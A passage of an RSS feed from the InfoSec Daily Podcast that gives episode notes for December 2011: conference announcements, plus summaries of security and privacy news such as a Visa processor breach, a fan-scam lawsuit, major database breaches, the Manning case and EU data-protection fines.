	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;</span><a href="http://torrentfreak.com/french-presidents-residence-busted-for-bittorrent-piracy-111215/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://torrentfreak.com/french-presidents-residence-busted-for-bittorrent-piracy-111215/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nicholas Sarkozy, the president of France and one of the most powerful men of Europe, was busted today after journalists from a French news site, armed with &Eacute;lys&eacute;e Palace IPs, took a peak to see what has been downloaded from the president&rsquo;s residence. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If the three-strike piracy law adopted by French authorities early this year would be applied, the Palace would be left without an Internetconnection for about two months. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A total of six downloads that can be considered copyright infringement were recorded by the new BitTorrent-use tracking service as coming from Sarkozy&rsquo;s place, reports TorrentFreak.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tower Heist, Arthur Christmas and a high quality version of a BeachBoys album were among the pirated materials.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now, even though the YouHaveDownloaded website&rsquo;s owners said that their service cannot handle Dynamic IP&rsquo;s, making the pirate-appointing business less accurate, a quick look at the IP addresses provided by Nicolas Perrier of Nikopik using the Whois service from DomainTools reveals that indeed the addresses belong to &ldquo;Presidence de la Republique&rdquo;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since the controversial website was launched, a lot of organizations that support anti-piracy movements were caught with their pants down. Yesterday we say how even Sony, Universal and Fox employees spend a lot of time downloading content from torrent sites.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcadvisor.co.uk/news/security/3325419/visa-investigates-security-breach-at-european-payment-processor"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/security/3325419/visa-investigates-security-breach-at-european-payment-processor</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Visa is investigating a potential security breach at an European payment processor that might have affected cardholders in eastern Europe.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Visa Europe has been informed of a potential data security breach at a European processor and an investigation is underway,&quot; the company said in a statement. &quot;We are working closely with our member banks to ensure cardholders are protected,&quot; it added.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The potentially affected payment processor is serving an undisclosed merchant chain that does business in several eastern European markets, Visa said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Multiple banks have been alerted and some have already taken steps to limit the potential fraud. Romanian state-owned CEC Bank is in the process of reissuing 17,000 payment cards as a result of the incident.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The bank </span><a href="https://www.cec.ro/3577/section.aspx/2957"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">received official reports</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> according to which information corresponding to a number of payment cards issued by Romanian and foreign financial institutions had been compromised.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.hollywoodreporter.com/thr-esq/ellen-degeneres-facebook-scam-lawsuit-273805"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.hollywoodreporter.com/thr-esq/ellen-degeneres-facebook-scam-lawsuit-273805</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pretty much everyone with an e-mail account is familiar with the type of scam wherein a person with connections has something valuable to offer, but is experiencing some form of trouble and is willing to provide compensation for needed assistance. Is someone trying to swindle those who would do practically anything for an all expense paid trip to meet their favorite talk show host?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Tuesday, Telepictures Prods, a subsidiary of Warner Bros. and a producer of The Ellen DeGeneres Show filed a lawsuit against an anonymous individual who allegedly has been posing as Ellen&#39;s manager.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the complaint, the defendant(s) created fake email accounts and a profile on Facebook in the name of Eric Gold, DeGeneres&#39; manager. After passing himself off as an employee of her show, the fake Eric Gold is said to have solicited and collected personal information from fans. How? Fans were told that they had been selected to appear on the program.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&#39;ve collected more info on the scam. A typical message began: </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;You have been selected from members of the Ellen DeGenere&#39;s Facebook Fan page to be on her talk show because of your comment on the &#39;Halloween edition&#39;. If you are interested in attending, this offer is an all expense paid trip from Ellen in appreciation of being a fan of Ellen.You are required to reply as soon as possible because we have limited time.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The message then promises that the recipient will receive a $3,000 check to cover travel expenses. To receive the check, the recipients have to give their full name, address, cell phone number and e-mail address.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.darkreading.com/database-security/167901020/security/news/232300536/five-big-database-breaches-of-2011-s-second-half.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/database-security/167901020/security/news/232300536/five-big-database-breaches-of-2011-s-second-half.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Though the second half of the year has been comparably calmer than the first half&#39;s excitement over database breaches at RSA, Sony, and Epsilon, the breach numbers continued to roll in &#8212; especially at healthcare organizations, which made up a disproportionate number of exposed records. Here are some of the biggest breaches that went down in the second half of the year, along with a few database security lessons learned.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. The Breach Victim: Nemours</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Assets Stolen/Affected: Names, addresses, dates of birth, Social Security numbers, insurance data, medical treatment data, and bank account information for 1.6 million patients, vendors, and employees.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. The Breach Victim: Tricare/SAIC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Assets Stolen/Affected: Protected health information from 5.1 million patients of U.S. military hospitals and clinics.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. The Breach Victim: Sutter Physicians Services and Sutter Medical Foundation</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Assets Stolen/Affected: Personally identifiable information of 3.3 million patients supported by Sutter Physicians Services and medical information of another 934,000 Sutter Medical Foundation patients.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. The Breach Victim: SK Communications</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Assets Stolen/Affected: Thirty-five million names, email addresses, phone numbers, and resident registration numbers of social media users at South Korean sites Cyworld and Nate.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5. The Breach Victim: Valve, Inc.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Assets Stolen/Affected: Personally identifiable information for 35 million users of Valve&#39;s online gaming site.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://abcnews.go.com/Technology/wireStory/us-set-soldier-leaks-targets-assange-15162032"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://abcnews.go.com/Technology/wireStory/us-set-soldier-leaks-targets-assange-15162032</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As the suspected source for the biggest intelligence leak in American history faces his first hearing Friday, U.S. prosecutors have their eye on another prize: the man who disclosed the documents to the world.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When WikiLeaks&#39; spectacular disclosures of U.S. secrets exploded onto the scene last year, much of Washington&#39;s anger coalesced around Julian Assange, the silver-haired globe-trotting figure whose outspoken defiance of the Pentagon and the State Department riled politicians on both sides of the aisle. Pfc. Bradley Manning, long under lock and key, hasn&#39;t attracted the same level of ire.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The pair&#39;s fates have been intertwined, however, even if the Australian-born computer hacker says he didn&#39;t know the private&#39;s name until after news of his arrest emerged in June 2010. Manning&#39;s alleged disclosures put Assange at the epicenter of a diplomatic earthquake.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Assange in turn has worked energetically to drum up support for the imprisoned soldier &mdash; all while emphasizing that the way his anti-secrecy site was set up meant he could not be sure if Manning was his source.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">U.S. investigators have been scrutinizing links between the two as they explore the possibility of charging the Australian with serious crimes under U.S. law. A Virginia grand jury is studying evidence that might link Assange to Manning, but no action has yet been taken.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><a href="http://www.wired.com/threatlevel/2011/12/internet-war-2/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2011/12/internet-war-2/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The House and Senate agreed to give the U.S. military the power to conduct &ldquo;offensive&rdquo; strikes online &mdash; including clandestine attacks, via a little-noticed provision in the military&rsquo;s 2012 funding bill.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The power, which was included in the House version but not the Senate version, was included in the final &ldquo;reconciled&rdquo; bill that is all but guaranteed to pass into law.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Congress affirms that the Department of Defense has the capability, and upon direction by the President may conduct offensive operations in cyberspace to defend our Nation, Allies and interests, subject to&ndash; (1) the policy principles and legal regimes that the Department follows for kinetic capabilities, including the law of armed conflict; and (2) the War Powers Resolution (50 U.S.C. 1541 et seq.).</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While &ldquo;offensive&rdquo; action isn&rsquo;t defined, that&rsquo;s likely to include things like unleashing a worm like the Stuxnet worm that damaged Iran&rsquo;s nuclear centrifuges, hacking into another country&rsquo;s power grid to bring it down, disabling websites via denial-of-service attacks, or as the CIA has already done with some collateral damage, hacking into a forum where would-be terrorists meet in order to permanently disable it.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.ft.com/cms/s/2/bf962998-1d01-11e1-a26a-00144feabdc0.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ft.com/cms/s/2/bf962998-1d01-11e1-a26a-00144feabdc0.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Businesses breaching European Union privacy rules will face fines of up to 5 per cent of their global turnover under sweeping proposals to be unveiled next month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the first significant update of data protection legislation since 1995, companies found to have mishandled any personal data they hold &ndash; be it of their customers, suppliers or their own employees &ndash; will face the highest levels of fines, which could extend to billions of euros for large multinationals.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The measures are being finalised within the European Commission. They will have to be approved by national governments, some of which &ndash; especially Germany &ndash; will be reluctant to lose oversight on privacy matters to Brussels. The process is likely to take at least two years, with another two before the measures come into effect.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The proposals would bolster significantly the EU&rsquo;s powers on combating data protection breaches, such as when companies sell customer data to third parties without authorisation or fail to adequately protect information held by social networks and &ldquo;cloud computing&rdquo; services.</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-547-naughty-french-visa-ellen-scam-big-5-manning/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3279/0/infosec-daily-podcast-episode-547.mp3" length="19752269" type="audio/mpeg" />
		<itunes:duration>0:41:06</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 547 for December 15, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.
&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Br[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 547 for December 15, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.
&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;&#160;http://torrentfreak.com/french-presidents-residence-busted-for-bittorrent-piracy-111215/
	Nicholas Sarkozy, the president of France and one of the most powerful men of Europe, was busted today after journalists from a French news site, armed with &#201;lys&#233;e Palace IPs, took a peak to see what has been downloaded from the president&#8217;s residence. 
	If the three-strike piracy law adopted by French authorities early this year would be applied, the Palace would be left without an Internetconnection for about two months. 
	A total of six downloads that can be considered copyright infringement were recorded by the new BitTorrent-use tracking service as coming from Sarkozy&#8217;s place, reports TorrentFreak.
	Tower Heist, Arthur Christmas and a high quality version of a BeachBoys album were among the pirated materials.
	Now, even though the YouHaveDownloaded website&#8217;s owners said that their service cannot handle Dynamic IP&#8217;s, making the pirate-appointing business less accurate, a quick look at the IP addresses provided by Nicolas Perrier of Nikopik using the Whois service from DomainTools reveals that indeed the addresses belong to &#8220;Presidence de la Republique&#8221;.
	Since the controversial website was launched, a lot of organizations that support anti-piracy movements were caught with their pants down. Yesterday we say how even Sony, Universal and Fox employees spend a lot of time downloading content from torrent sites.
	&#8230;
	Source: &#160;http://www.pcadvisor.co.uk/news/security/3325419/visa-investigates-security-breach-at-european-payment-processor
	Visa is investigating a potential security breach at an European payment processor that might have affected cardholders in eastern Europe.
	&#34;Visa Europe has been informed of a potential data security breach at a European processor and an investigation is underway,&#34; the company said[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 546 &#8211; &#8220;Pentest Lessons&#8221;, Back to Paper, Social Media Refuseniks, Youhavedownloaded, SCADA, Gene Simmons DDoS</title>
		<link>http://www.isdpodcast.com/episode-546-pentest-lessons-back-to-paper-social-media-refuseniks-youhavedownloaded-scada-gene-simmons-ddos</link>
		<comments>http://www.isdpodcast.com/episode-546-pentest-lessons-back-to-paper-social-media-refuseniks-youhavedownloaded-scada-gene-simmons-ddos#comments</comments>
		<pubDate>Thu, 15 Dec 2011 01:48:31 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3274</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 546 for December 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 546 for December 14, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br />
	Announcements:</span></p>
<p><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
